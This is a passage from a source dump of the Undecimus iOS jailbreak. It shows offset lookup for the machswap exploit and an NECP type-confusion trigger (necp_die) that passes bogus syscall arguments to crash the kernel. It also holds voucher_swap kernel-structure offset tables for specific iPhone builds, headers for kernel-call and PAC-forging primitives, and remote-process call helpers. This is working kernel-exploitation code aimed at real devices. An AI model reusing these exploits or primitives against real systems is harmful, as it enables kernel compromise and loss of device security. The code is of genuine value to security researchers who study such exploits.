93 | #include
94 |
95 | machswap_offsets_t *get_machswap_offsets(void)
96 | {
97 | size_t size;
98 | cpu_type_t cpu_type;
99 | size = sizeof(cpu_type_t);
100 | if (sysctlbyname("hw.cputype", &cpu_type, &size, NULL, 0) == -1) {
101 | LOG("hw.cputype: %s", strerror(errno));
102 | return NULL;
103 | }
104 |
105 | cpu_subtype_t cpu_subtype;
106 | size = sizeof(cpu_subtype_t);
107 | if (sysctlbyname("hw.cpusubtype", &cpu_subtype, &size, NULL, 0) == -1) {
108 | LOG("hw.cpusubtype: %s", strerror(errno));
109 | return NULL;
110 | }
111 |
112 | int ctl[2];
113 | ctl[0] = CTL_KERN;
114 | ctl[1] = KERN_OSRELEASE;
115 |
116 | if (sysctl(ctl, 2, NULL, &size, NULL, 0) == -1 && errno != ENOMEM) {
117 | LOG("kern.osrelease: %s", strerror(errno));
118 | return NULL;
119 | }
120 |
121 | char release[size];
122 | if (sysctl(ctl, 2, release, &size, NULL, 0) == -1) {
123 | LOG("kern.osrelease: %s", strerror(errno));
124 | return NULL;
125 | }
126 |
127 |
128 | for (size_t i = 0; machswap_offsets[i] != 0; ++i)
129 | {
130 | if (strncmp(machswap_offsets[i]->constant.release, release, strlen(machswap_offsets[i]->constant.release)) == 0)
131 | {
132 | if (machswap_offsets[i]->constant.cpu_subtype == cpu_subtype ||
133 | machswap_offsets[i]->constant.cpu_subtype == CPU_SUBTYPE_ARM_ALL) {
134 | return machswap_offsets[i];
135 | }
136 | }
137 | }
138 |
139 | ctl[1] = KERN_VERSION;
140 |
141 | if (sysctl(ctl, 2, NULL, &size, NULL, 0) == -1 && errno != ENOMEM) {
142 | LOG("kern.version: %s", strerror(errno));
143 | return NULL;
144 | }
145 |
146 | char version[size];
147 | if (sysctl(ctl, 2, version, &size, NULL, 0) == -1) {
148 | LOG("kern.version: %s", strerror(errno));
149 | return NULL;
150 | }
151 |
152 | LOG("Failed to get offsets for kernel version: %s", version);
153 | return NULL;
154 | }
155 |
--------------------------------------------------------------------------------
/Undecimus/source/machswap_pwn.h:
--------------------------------------------------------------------------------
1 | #ifndef MACHSWAP_PWN_H
2 | #define MACHSWAP_PWN_H
3 |
4 | #include
5 |
6 | #include "common.h"
7 | #include "machswap_offsets.h"
8 |
9 | kern_return_t machswap_exploit(machswap_offsets_t *offsets);
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/Undecimus/source/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // Undecimus
4 | //
5 | // Created by pwn20wnd on 8/29/18.
6 | // Copyright © 2018 - 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #include
10 | #import
11 | #import "AppDelegate.h"
12 |
13 | int main(int argc, char * argv[]) {
14 | signal(SIGPIPE, SIG_IGN);
15 | @autoreleasepool {
16 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Undecimus/source/necp.c:
--------------------------------------------------------------------------------
1 | #include "necp.h"
2 | #include
3 | #include
4 |
5 | // https://blogs.projectmoon.pw/2018/11/30/A-Late-Kernel-Bug-Type-Confusion-in-NECP/NECPTypeConfusion.c
6 |
7 | int necp_die() {
8 | int necp_fd = syscall(SYS_necp_open, 0);
9 | if (necp_fd < 0) {
10 | LOG("Create NECP client failed!");
11 | return 0;
12 | }
13 | LOG("NECP client = %d", necp_fd);
14 | syscall(SYS_necp_session_action, necp_fd, 1, 0x1234, 0x5678);
15 | return 0;
16 | }
17 |
--------------------------------------------------------------------------------
/Undecimus/source/necp.h:
--------------------------------------------------------------------------------
1 | #ifndef necp_h
2 | #define necp_h
3 |
4 | #include
5 |
6 | int necp_die(void);
7 |
8 | #endif /* necp_h */
9 |
--------------------------------------------------------------------------------
/Undecimus/source/pac.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call/pac.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_CALL__PAC_H_
6 | #define VOUCHER_SWAP__KERNEL_CALL__PAC_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | /*
13 | * stage2_kernel_call_init
14 | *
15 | * Description:
16 | * Initialize stage 2 of kernel function calling.
17 | *
18 | * Initializes:
19 | * stage2_kernel_call_7v()
20 | * kernel_forge_pacia()
21 | * kernel_forge_pacia_with_type()
22 | * kernel_forge_pacda()
23 | */
24 | bool stage2_kernel_call_init(void);
25 |
26 | /*
27 | * stage2_kernel_call_deinit
28 | *
29 | * Description:
30 | * Deinitialize stage 2 of kernel function calling.
31 | */
32 | void stage2_kernel_call_deinit(void);
33 |
34 | /*
35 | * stage2_kernel_call_7v
36 | *
37 | * Description:
38 | * Call a kernel function using our stage 2 execute primitive.
39 | *
40 | * Restrictions:
41 | * At most 7 arguments can be passed.
42 | * The return value is truncated to 32 bits.
43 | * At stage 2, only arguments X1 - X6 are controlled.
44 | */
45 | uint32_t stage2_kernel_call_7v(uint64_t function,
46 | size_t argument_count, const uint64_t arguments[]);
47 |
48 | #endif
49 |
--------------------------------------------------------------------------------
/Undecimus/source/parameters.c:
--------------------------------------------------------------------------------
1 | /*
2 | * parameters.c
3 | * Brandon Azad
4 | */
5 | #define PARAMETERS_EXTERN
6 | #include "parameters.h"
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 |
14 | #include "log.h"
15 | #include "platform.h"
16 | #include "platform_match.h"
17 |
18 | // ---- Initialization routines -------------------------------------------------------------------
19 |
20 | // A struct describing an initialization.
21 | struct initialization {
22 | const char *devices;
23 | const char *builds;
24 | void (*init)(void);
25 | };
26 |
27 | // Run initializations matching this platform.
28 | static size_t
29 | run_initializations(struct initialization *inits, size_t count) {
30 | size_t match_count = 0;
31 | for (size_t i = 0; i < count; i++) {
32 | struct initialization *init = &inits[i];
33 | if (platform_matches(init->devices, init->builds)) {
34 | init->init();
35 | match_count++;
36 | }
37 | }
38 | return match_count;
39 | }
40 |
41 | // A helper macro to get the number of elements in a static array.
42 | #define ARRAY_COUNT(x) (sizeof(x) / sizeof((x)[0]))
43 |
44 | // ---- General system parameters -----------------------------------------------------------------
45 |
46 | // Initialization for general system parameters.
47 | static void
48 | init__system_parameters() {
49 | STATIC_ADDRESS(kernel_base) = 0xFFFFFFF007004000;
50 | kernel_slide_step = 0x200000;
51 | message_size_for_kmsg_zone = 76;
52 | kmsg_zone_size = 256;
53 | max_ool_ports_per_message = 16382;
54 | gc_step = 2 * MB;
55 | }
56 |
57 | // A list of general system parameter initializations by platform.
58 | static struct initialization system_parameters[] = {
59 | { "*", "*", init__system_parameters },
60 | };
61 |
62 | // ---- Offset initialization ---------------------------------------------------------------------
63 |
64 | // Initialization for iPhone11,8 16C50 (and similar devices).
65 | static void
66 | offsets__iphone11_8__16C50() {
67 | SIZE(ipc_entry) = 0x18;
68 | OFFSET(ipc_entry, ie_object) = 0;
69 | OFFSET(ipc_entry, ie_bits) = 8;
70 | OFFSET(ipc_entry, ie_request) = 16;
71 |
72 | SIZE(ipc_port) = 0xa8;
73 | BLOCK_SIZE(ipc_port) = 0x4000;
74 | OFFSET(ipc_port, ip_bits) = 0;
75 | OFFSET(ipc_port, ip_references) = 4;
76 | OFFSET(ipc_port, waitq_flags) = 24;
77 | OFFSET(ipc_port, imq_messages) = 64;
78 | OFFSET(ipc_port, imq_msgcount) = 80;
79 | OFFSET(ipc_port, imq_qlimit) = 82;
80 | OFFSET(ipc_port, ip_receiver) = 96;
81 | OFFSET(ipc_port, ip_kobject) = 104;
82 | OFFSET(ipc_port, ip_nsrequest) = 112;
83 | OFFSET(ipc_port, ip_requests) = 128;
84 | OFFSET(ipc_port, ip_mscount) = 156;
85 | OFFSET(ipc_port, ip_srights) = 160;
86 |
87 | SIZE(ipc_port_request) = 0x10;
88 | OFFSET(ipc_port_request, ipr_soright) = 0;
89 |
90 | OFFSET(ipc_space, is_table_size) = 0x14;
91 | OFFSET(ipc_space, is_table) = 0x20;
92 |
93 | SIZE(ipc_voucher) = 0x50;
94 | BLOCK_SIZE(ipc_voucher) = 0x4000;
95 |
96 | OFFSET(proc, p_pid) = 0x60;
97 | OFFSET(proc, p_ucred) = 0xf8;
98 |
99 | SIZE(sysctl_oid) = 0x50;
100 | OFFSET(sysctl_oid, oid_parent) = 0x0;
101 | OFFSET(sysctl_oid, oid_link) = 0x8;
102 | OFFSET(sysctl_oid, oid_kind) = 0x14;
103 | OFFSET(sysctl_oid, oid_handler) = 0x30;
104 | OFFSET(sysctl_oid, oid_version) = 0x48;
105 | OFFSET(sysctl_oid, oid_refcnt) = 0x4c;
106 |
107 | OFFSET(task, lck_mtx_type) = 0xb;
108 | OFFSET(task, ref_count) = 0x10;
109 | OFFSET(task, active) = 0x14;
110 | OFFSET(task, map) = 0x20;
111 | OFFSET(task, itk_space) = 0x300;
112 | OFFSET(task, bsd_info) = 0x368;
113 | }
114 |
115 | // Initialization for iPhone10,1 16B92 (and similar devices).
116 | static void
117 | offsets__iphone10_1__16B92() {
118 | offsets__iphone11_8__16C50();
119 |
120 | OFFSET(task, bsd_info) = 0x358;
121 | }
122 |
123 | // Initialization for iPhone10,1 16B92 (and similar devices).
124 | static void
125 | offsets__iphone9_3__15E302() {
126 | SIZE(ipc_entry) = 0x18;
127 | OFFSET(ipc_entry, ie_object) = 0;
128 | OFFSET(ipc_entry, ie_bits) = 8;
129 | OFFSET(ipc_entry, ie_request) = 16;
130 |
131 | SIZE(ipc_port) = 0xa8;
132 | BLOCK_SIZE(ipc_port) = 0x4000;
133 | OFFSET(ipc_port, ip_bits) = 0;
134 | OFFSET(ipc_port, ip_references) = 4;
135 | OFFSET(ipc_port, waitq_flags) = 24;
136 | OFFSET(ipc_port, imq_messages) = 0x40;
137 | OFFSET(ipc_port, imq_msgcount) = 0x50;
138 | OFFSET(ipc_port, imq_qlimit) = 0x52;
139 | OFFSET(ipc_port, ip_receiver) = 0x60;
140 | OFFSET(ipc_port, ip_kobject) = 0x68;
141 | OFFSET(ipc_port, ip_nsrequest) = 0x70;
142 | OFFSET(ipc_port, ip_requests) = 0x80;
143 | OFFSET(ipc_port, ip_mscount) = 0x9c;
144 | OFFSET(ipc_port, ip_srights) = 0xa0;
145 |
146 | SIZE(ipc_port_request) = 0x10;
147 | OFFSET(ipc_port_request, ipr_soright) = 0;
148 |
149 | OFFSET(ipc_space, is_table_size) = 0x14;
150 | OFFSET(ipc_space, is_table) = 0x20;
151 |
152 | SIZE(ipc_voucher) = 0x50;
153 | BLOCK_SIZE(ipc_voucher) = 0x4000;
154 |
155 | OFFSET(proc, p_pid) = 0x10;
156 | OFFSET(proc, p_ucred) = 0x100;
157 |
158 | SIZE(sysctl_oid) = 0x50;
159 | OFFSET(sysctl_oid, oid_parent) = 0x0;
160 | OFFSET(sysctl_oid, oid_link) = 0x8;
161 | OFFSET(sysctl_oid, oid_kind) = 0x14;
162 | OFFSET(sysctl_oid, oid_handler) = 0x30;
163 | OFFSET(sysctl_oid, oid_version) = 0x48;
164 | OFFSET(sysctl_oid, oid_refcnt) = 0x4c;
165 |
166 | OFFSET(task, lck_mtx_type) = 0xb;
167 | OFFSET(task, ref_count) = 0x10;
168 | OFFSET(task, active) = 0x14;
169 | OFFSET(task, map) = 0x20;
170 | OFFSET(task, itk_space) = 0x308;
171 | OFFSET(task, bsd_info) = 0x368;
172 | }
173 |
174 | // Initialize offset parameters whose values are computed from other parameters.
175 | static void
176 | initialize_computed_offsets() {
177 | COUNT_PER_BLOCK(ipc_port) = BLOCK_SIZE(ipc_port) / SIZE(ipc_port);
178 | COUNT_PER_BLOCK(ipc_voucher) = BLOCK_SIZE(ipc_voucher) / SIZE(ipc_voucher);
179 | }
180 |
181 | // A list of offset initializations by platform.
182 | static struct initialization offsets[] = {
183 | { "*", "15A5278f-15G77", offsets__iphone9_3__15E302 },
184 | { "*", "16A366-16D5024a", offsets__iphone10_1__16B92 },
185 | { "iPhone11,*", "16A366-16D5024a", offsets__iphone11_8__16C50 },
186 | { "iPad8,*", "16A366-16D5024a", offsets__iphone11_8__16C50 },
187 | { "*", "*", initialize_computed_offsets },
188 | };
189 |
190 | // The minimum number of offsets that must match in order to declare a platform initialized.
191 | static const size_t min_offsets = 2;
192 |
193 | // ---- Public API --------------------------------------------------------------------------------
194 |
195 | bool
196 | parameters_init() {
197 | // Get general platform info.
198 | platform_init();
199 | // Initialize general system parameters.
200 | run_initializations(system_parameters, ARRAY_COUNT(system_parameters));
201 | // Initialize offsets.
202 | size_t count = run_initializations(offsets, ARRAY_COUNT(offsets));
203 | if (count < min_offsets) {
204 | ERROR("no offsets for %s %s", platform.machine, platform.osversion);
205 | return false;
206 | }
207 | return true;
208 | }
209 |
--------------------------------------------------------------------------------
/Undecimus/source/parameters.h:
--------------------------------------------------------------------------------
1 | /*
2 | * parameters.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__PARAMETERS_H_
6 | #define VOUCHER_SWAP__PARAMETERS_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | #ifdef PARAMETERS_EXTERN
13 | #define extern PARAMETERS_EXTERN
14 | #endif
15 |
16 | // Some helpful units.
17 | #define KB (1024uLL)
18 | #define MB (1024uLL * KB)
19 | #define GB (1024uLL * MB)
20 |
21 | // Generate the name for an offset.
22 | #define OFFSET(base_, object_) _##base_##__##object_##__offset_
23 |
24 | // Generate the name for the size of an object.
25 | #define SIZE(object_) _##object_##__size_
26 |
27 | // Generate the name for the size of a zalloc block of objects.
28 | #define BLOCK_SIZE(object_) _##object_##__block_size_
29 |
30 | // Generate the name for the number of elements in a zalloc block.
31 | #define COUNT_PER_BLOCK(object_) _##object_##__per_block_
32 |
33 | // Generate the name for the address of an object.
34 | #define ADDRESS(object_) _##object_##__address_
35 |
36 | // Generate the name for the static (unslid) address of an object.
37 | #define STATIC_ADDRESS(object_) _##object_##__static_address_
38 |
39 | // A convenience macro for accessing a field of a structure.
40 | #define FIELD(object_, struct_, field_, type_) \
41 | ( *(type_ *) ( ((uint8_t *) object_) + OFFSET(struct_, field_) ) )
42 |
43 | // The static base address of the kernel.
44 | extern uint64_t STATIC_ADDRESS(kernel_base);
45 |
46 | // The kernel_slide granularity.
47 | extern uint64_t kernel_slide_step;
48 |
49 | // Messages up to this size are allocated from the dedicated ipc.kmsgs zone.
50 | extern size_t message_size_for_kmsg_zone;
51 |
52 | // The size of elements in ipc.kmsgs.
53 | extern size_t kmsg_zone_size;
54 |
55 | // The maximum number of OOL ports in a single message.
56 | extern size_t max_ool_ports_per_message;
57 |
58 | // How much to allocate between sleeps while trying to trigger garbage collection.
59 | extern size_t gc_step;
60 |
61 | // Parameters for ipc_entry.
62 | extern size_t SIZE(ipc_entry);
63 | extern size_t OFFSET(ipc_entry, ie_object);
64 | extern size_t OFFSET(ipc_entry, ie_bits);
65 | extern size_t OFFSET(ipc_entry, ie_request);
66 |
67 | // Parameters for ipc_port.
68 | extern size_t SIZE(ipc_port);
69 | extern size_t BLOCK_SIZE(ipc_port);
70 | extern size_t COUNT_PER_BLOCK(ipc_port);
71 | extern size_t OFFSET(ipc_port, ip_bits);
72 | extern size_t OFFSET(ipc_port, ip_references);
73 | extern size_t OFFSET(ipc_port, waitq_flags);
74 | extern size_t OFFSET(ipc_port, imq_messages);
75 | extern size_t OFFSET(ipc_port, imq_msgcount);
76 | extern size_t OFFSET(ipc_port, imq_qlimit);
77 | extern size_t OFFSET(ipc_port, ip_receiver);
78 | extern size_t OFFSET(ipc_port, ip_kobject);
79 | extern size_t OFFSET(ipc_port, ip_nsrequest);
80 | extern size_t OFFSET(ipc_port, ip_requests);
81 | extern size_t OFFSET(ipc_port, ip_mscount);
82 | extern size_t OFFSET(ipc_port, ip_srights);
83 |
84 | // Parameters for ipc_port_request.
85 | extern size_t SIZE(ipc_port_request);
86 | extern size_t OFFSET(ipc_port_request, ipr_soright);
87 |
88 | // Parameters for struct ipc_space.
89 | extern size_t OFFSET(ipc_space, is_table_size);
90 | extern size_t OFFSET(ipc_space, is_table);
91 |
92 | // Parameters for ipc_voucher.
93 | extern size_t SIZE(ipc_voucher);
94 | extern size_t BLOCK_SIZE(ipc_voucher);
95 | extern size_t COUNT_PER_BLOCK(ipc_voucher);
96 |
97 | // Parameters for struct proc.
98 | extern size_t OFFSET(proc, p_pid);
99 | extern size_t OFFSET(proc, p_ucred);
100 |
101 | // Parameters for struct sysctl_oid.
102 | extern size_t SIZE(sysctl_oid);
103 | extern size_t OFFSET(sysctl_oid, oid_parent);
104 | extern size_t OFFSET(sysctl_oid, oid_link);
105 | extern size_t OFFSET(sysctl_oid, oid_kind);
106 | extern size_t OFFSET(sysctl_oid, oid_handler);
107 | extern size_t OFFSET(sysctl_oid, oid_version);
108 | extern size_t OFFSET(sysctl_oid, oid_refcnt);
109 |
110 | // Parameters for struct task.
111 | extern size_t OFFSET(task, lck_mtx_type);
112 | extern size_t OFFSET(task, ref_count);
113 | extern size_t OFFSET(task, active);
114 | extern size_t OFFSET(task, map);
115 | extern size_t OFFSET(task, itk_space);
116 | extern size_t OFFSET(task, bsd_info);
117 |
118 | /*
119 | * parameters_init
120 | *
121 | * Description:
122 | * Initialize the parameters for the system.
123 | */
124 | bool parameters_init(void);
125 |
126 | #undef extern
127 |
128 | #endif
129 |
--------------------------------------------------------------------------------
/Undecimus/source/platform.c:
--------------------------------------------------------------------------------
1 | /*
2 | * platform.c
3 | * Brandon Azad
4 | */
5 | #define PLATFORM_EXTERN
6 | #include "platform.h"
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #include "log.h"
14 |
15 | // ---- Initialization ----------------------------------------------------------------------------
16 |
17 | void
18 | platform_init() {
19 | // Only initialize once.
20 | static bool initialized = false;
21 | if (initialized) {
22 | return;
23 | }
24 | initialized = true;
25 | // Set the page size.
26 | platform.page_size = vm_kernel_page_size;
27 | page_size = platform.page_size;
28 | // Get the machine name (e.g. iPhone11,8).
29 | struct utsname u = {};
30 | int error = uname(&u);
31 | assert(error == 0);
32 | strncpy((char *)platform.machine, u.machine, sizeof(platform.machine));
33 | // Get the build (e.g. 16C50).
34 | size_t osversion_size = sizeof(platform.osversion);
35 | error = sysctlbyname("kern.osversion",
36 | (void *)platform.osversion, &osversion_size, NULL, 0);
37 | assert(error == 0);
38 | // Get basic host info.
39 | mach_port_t host = mach_host_self();
40 | assert(MACH_PORT_VALID(host));
41 | host_basic_info_data_t basic_info;
42 | mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT;
43 | kern_return_t kr = host_info(host, HOST_BASIC_INFO, (host_info_t) &basic_info, &count);
44 | assert(kr == KERN_SUCCESS);
45 | platform.cpu_type = basic_info.cpu_type;
46 | platform.cpu_subtype = basic_info.cpu_subtype;
47 | platform.physical_cpu = basic_info.physical_cpu;
48 | platform.logical_cpu = basic_info.logical_cpu;
49 | platform.memory_size = basic_info.max_mem;
50 | INFO("memory_size: %zu", platform.memory_size);
51 | mach_port_deallocate(mach_task_self(), host);
52 | // Log basic platform info.
53 | DEBUG_TRACE(1, "platform: %s %s", platform.machine, platform.osversion);
54 | }
55 |
--------------------------------------------------------------------------------
/Undecimus/source/platform.h:
--------------------------------------------------------------------------------
1 | /*
2 | * platform.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__PLATFORM_H_
6 | #define VOUCHER_SWAP__PLATFORM_H_
7 |
8 | #include
9 | #include
10 |
11 | #ifdef PLATFORM_EXTERN
12 | #define extern PLATFORM_EXTERN
13 | #endif
14 |
15 | /*
16 | * platform
17 | *
18 | * Description:
19 | * Basic information about the platform.
20 | */
21 | struct platform {
22 | /*
23 | * platform.machine
24 | *
25 | * Description:
26 | * The name of the platform, e.g. iPhone11,8.
27 | */
28 | const char machine[32];
29 | /*
30 | * platform.osversion
31 | *
32 | * Description:
33 | * The version of the OS build, e.g. 16C50.
34 | */
35 | const char osversion[32];
36 | /*
37 | * platform.cpu_type
38 | *
39 | * Description:
40 | * The platform CPU type.
41 | */
42 | cpu_type_t cpu_type;
43 | /*
44 | * platform.cpu_subtype
45 | *
46 | * Description:
47 | * The platform CPU subtype.
48 | */
49 | cpu_subtype_t cpu_subtype;
50 | /*
51 | * platform.physical_cpu
52 | *
53 | * Description:
54 | * The number of physical CPU cores.
55 | */
56 | unsigned physical_cpu;
57 | /*
58 | * platform.logical_cpu
59 | *
60 | * Description:
61 | * The number of logical CPU cores.
62 | */
63 | unsigned logical_cpu;
64 | /*
65 | * platform.page_size
66 | *
67 | * Description:
68 | * The kernel page size.
69 | */
70 | size_t page_size;
71 | /*
72 | * platform.memory_size
73 | *
74 | * Description:
75 | * The size of physical memory on the device.
76 | */
77 | size_t memory_size;
78 | };
79 | extern struct platform platform;
80 |
81 | /*
82 | * page_size
83 | *
84 | * Description:
85 | * The kernel page size on this platform, made available globally for convenience.
86 | */
87 | extern size_t page_size;
88 |
89 | /*
90 | * platform_init
91 | *
92 | * Description:
93 | * Initialize the platform.
94 | */
95 | void platform_init(void);
96 |
97 | #undef extern
98 |
99 | #endif
100 |
--------------------------------------------------------------------------------
/Undecimus/source/platform_match.h:
--------------------------------------------------------------------------------
1 | /*
2 | * platform_match.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__PLATFORM_MATCH_H_
6 | #define VOUCHER_SWAP__PLATFORM_MATCH_H_
7 |
8 | #include
9 |
10 | /*
11 | * platform_matches_device
12 | *
13 | * Description:
14 | * Check whether the current platform matches the specified device or range of devices.
15 | *
16 | * Match format:
17 | * The match string may either specify a single device glob or a range of device globs. For
18 | * example:
19 | *
20 | * "iPhone11,8" Matches only iPhone11,8
21 | * "iPhone11,*" Matches all iPhone11 devices, including e.g. iPhone11,4.
22 | * "iPhone*,*" Matches all iPhone devices.
23 | * "iPhone11,4-iPhone11,8" Matches all iPhone devices between 11,4 and 11,8, inclusive.
24 | * "iPhone10,*-11,*" Matches all iPhone10 and iPhone11 devices.
25 | *
26 | * As a special case, "*" matches all devices.
27 | */
28 | bool platform_matches_device(const char *device_range);
29 |
30 | /*
31 | * platform_matches_build
32 | *
33 | * Description:
34 | * Check whether the current platform matches the specified build version or range of build
35 | * versions.
36 | *
37 | * Match format:
38 | * The match string may either specify a single build version or a range of build versions.
39 | * For example:
40 | *
41 | * "16C50" Matches only build 16C50.
42 | * "16B92-16C50" Matches all builds between 16B92 and 16C50, inclusive.
43 | *
44 | * As a special case, either build version may be replaced with "*" to indicate a lack of
45 | * lower or upper bound:
46 | *
47 | * "*-16B92" Matches all builds up to and including 16B92.
48 | * "16C50-*" Matches build 16C50 and later.
49 | * "*" Matches all build versions.
50 | */
51 | bool platform_matches_build(const char *build_range);
52 |
53 | /*
54 | * platform_matches
55 | *
56 | * Description:
57 | * A convenience function that combines platform_matches_device() and
58 | * platform_matches_build().
59 | */
60 | bool platform_matches(const char *device_range, const char *build_range);
61 |
62 | #endif
63 |
--------------------------------------------------------------------------------
/Undecimus/source/prefs.h:
--------------------------------------------------------------------------------
1 | //
2 | // prefs.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 5/3/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef prefs_h
10 | #define prefs_h
11 |
12 | #include
13 | #include
14 |
15 | #define K_TWEAK_INJECTION "TweakInjection"
16 | #define K_LOAD_DAEMONS "LoadDaemons"
17 | #define K_DUMP_APTICKET "DumpAPTicket"
18 | #define K_REFRESH_ICON_CACHE "RefreshIconCache"
19 | #define K_BOOT_NONCE "BootNonce"
20 | #define K_EXPLOIT "Exploit"
21 | #define K_DISABLE_AUTO_UPDATES "DisableAutoUpdates"
22 | #define K_DISABLE_APP_REVOKES "DisableAppRevokes"
23 | #define K_OVERWRITE_BOOT_NONCE "OverwriteBootNonce"
24 | #define K_EXPORT_KERNEL_TASK_PORT "ExportKernelTaskPort"
25 | #define K_RESTORE_ROOTFS "RestoreRootFS"
26 | #define K_INCREASE_MEMORY_LIMIT "IncreaseMemoryLimit"
27 | #define K_ECID "Ecid"
28 | #define K_INSTALL_OPENSSH "InstallOpenSSH"
29 | #define K_INSTALL_CYDIA "InstallCydia"
30 | #define K_RELOAD_SYSTEM_DAEMONS "DoReloadSystemDaemons"
31 | #define K_HIDE_LOG_WINDOW "HideLogWindow"
32 | #define K_RESET_CYDIA_CACHE "ResetCydiaCache"
33 | #define K_SSH_ONLY "SSHOnly"
34 | #define K_ENABLE_GET_TASK_ALLOW "DoEnableGetTaskAllow"
35 | #define K_SET_CS_DEBUGGED "SetCSDebugged"
36 | #define K_INSTALL_SILEO "InstallSileo"
37 | #define K_THEME "Theme"
38 | #define K_REINSTALL_SILEO_SWITCH "HideSileoSwitch"
39 | #define K_AUTO_RESPRING "AutoRespring"
40 | #define K_HIDE_PROGRESS_HUD "HideProgressHUD"
41 |
42 | #define K_BACKGROUND_COLOR "Background Color"
43 | #define K_U0_COLOR "Unc0ver Logo Color"
44 | #define K_FAKE_BUTTON_COLOR "Fake Button Color"
45 | #define K_FAKE_TINT_COLOR "Fake Button Tint Color"
46 | #define K_FAKE_TEXT_COLOR "Fake Button Text Color"
47 | #define K_GO_TEXT_COLOR "Go Button Text Color"
48 | #define K_OUTPUT_COLOR "Output View Color"
49 | #define K_OUTPUT_TEXT_COLOR "Output View Text Color"
50 | #define K_PICKER_TINT_COLOR "Exploit Picker Tint Color"
51 | #define K_TINT_COLOR "Tint Color"
52 | #define K_TEXT_COLOR "Text Color"
53 | #define K_DARK_TEXT_COLOR "Dark Text Color"
54 | #define K_LINK_COLOR "Link Color"
55 | #define K_DARK_STATUS_BAR "Light Status Bar Content"
56 |
57 | typedef struct {
58 | bool load_tweaks;
59 | bool load_daemons;
60 | bool dump_apticket;
61 | bool run_uicache;
62 | const char *boot_nonce;
63 | bool disable_auto_updates;
64 | bool disable_app_revokes;
65 | bool overwrite_boot_nonce;
66 | bool export_kernel_task_port;
67 | bool restore_rootfs;
68 | bool increase_memory_limit;
69 | const char *ecid;
70 | bool install_cydia;
71 | bool install_sileo;
72 | bool install_openssh;
73 | bool reload_system_daemons;
74 | bool reset_cydia_cache;
75 | bool ssh_only;
76 | bool enable_get_task_allow;
77 | bool set_cs_debugged;
78 | bool hide_log_window;
79 | bool uicache_sileo;
80 | bool uicache_cydia;
81 | int theme;
82 | bool reinstall_sileo_switch;
83 | bool auto_respring;
84 | bool hide_progress_hud;
85 | int exploit;
86 |
87 | int backgroundColor;
88 | int u0Color;
89 | int fakeButtonColor;
90 | int fakeTintColor;
91 | int fakeTextColor;
92 | int goTextColor;
93 | int outputColor;
94 | int outputTextColor;
95 | int pickerTintColor;
96 | int tintColor;
97 | int textColor;
98 | int darkTextColor;
99 | int linkColor;
100 | bool darkStatusBar;
101 | } prefs_t;
102 |
103 | prefs_t *new_prefs(void);
104 | prefs_t *copy_prefs(void);
105 | void release_prefs(prefs_t **prefs);
106 | bool load_prefs(prefs_t *prefs);
107 | bool set_prefs(prefs_t *prefs);
108 | void register_default_prefs(void);
109 | void repair_prefs(void);
110 | void reset_prefs(void);
111 |
112 | #endif /* prefs_h */
113 |
--------------------------------------------------------------------------------
/Undecimus/source/remote_call.h:
--------------------------------------------------------------------------------
1 | #ifndef remote_call_h
2 | #define remote_call_h
3 |
4 | #include
5 | #include
6 |
7 | enum arg_type {
8 | ARG_LITERAL,
9 | ARG_BUFFER,
10 | ARG_BUFFER_PERSISTENT, // don't free the buffer after the call
11 | ARG_OUT_BUFFER
12 | };
13 |
14 | typedef struct _arg_desc {
15 | uint64_t type;
16 | uint64_t value;
17 | uint64_t length;
18 | } arg_desc;
19 |
20 | #define REMOTE_LITERAL(val) \
21 | &(arg_desc) { ARG_LITERAL, (uint64_t)val, (uint64_t)0 }
22 | #define REMOTE_BUFFER(ptr, size) \
23 | &(arg_desc) { ARG_BUFFER, (uint64_t)ptr, (uint64_t)size }
24 | #define REMOTE_CSTRING(str) \
25 | &(arg_desc) { ARG_BUFFER, (uint64_t)str, (uint64_t)(strlen(str) + 1) }
26 | #define REMOTE_BUFFER_PERSISTENT(ptr, size) \
27 | &(arg_desc) { ARG_BUFFER_PERSISTENT, (uint64_t)ptr, (uint64_t)size }
28 | #define REMOTE_CSTRING_PERSISTENT(str) \
29 | &(arg_desc) { ARG_BUFFER_PERSISTENT, (uint64_t)str, (uint64_t)(strlen(str) + 1) }
30 |
31 | // allocate a remote buffer and pass the address of that to the remote function
32 | // when the function call is complete return the contents of that buffer to this process
33 | // and deallocate the buffer in the remote process
34 | // ptr should be a pointer to buffer capable of holding size bytes
35 | //
36 | // eg:
37 | // mach_port_t port = MACH_PORT_NULL;
38 | // call_remote(task_port, bootstrap_look_up, 3, REMOTE_LITERAL(remote_bootstrap_port), REMOTE_CSTRING("com.foo.bar"), REMOTE_OUT_BUFFER(&port, sizeof(port))
39 | // // port set to value of looked up port in remote process
40 | // // note that this doesn't actually transfer the port! use other helpers for that
41 | #define REMOTE_OUT_BUFFER(ptr, size) \
42 | &(arg_desc) { ARG_OUT_BUFFER, (uint64_t)ptr, (uint64_t)size }
43 |
44 | uint64_t call_remote(mach_port_t task_port, void* fptr, int n_params, ...);
45 | uint64_t thread_call_remote(mach_port_t thread_port, void* fptr, int n_params, ...);
46 |
47 | #endif
48 |
--------------------------------------------------------------------------------
/Undecimus/source/remote_memory.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #include "remote_memory.h"
14 |
15 | #include
16 |
17 | // no headers for these in iOS SDK:
18 | extern kern_return_t mach_vm_allocate(
19 | vm_map_t target,
20 | mach_vm_address_t* address,
21 | mach_vm_size_t size,
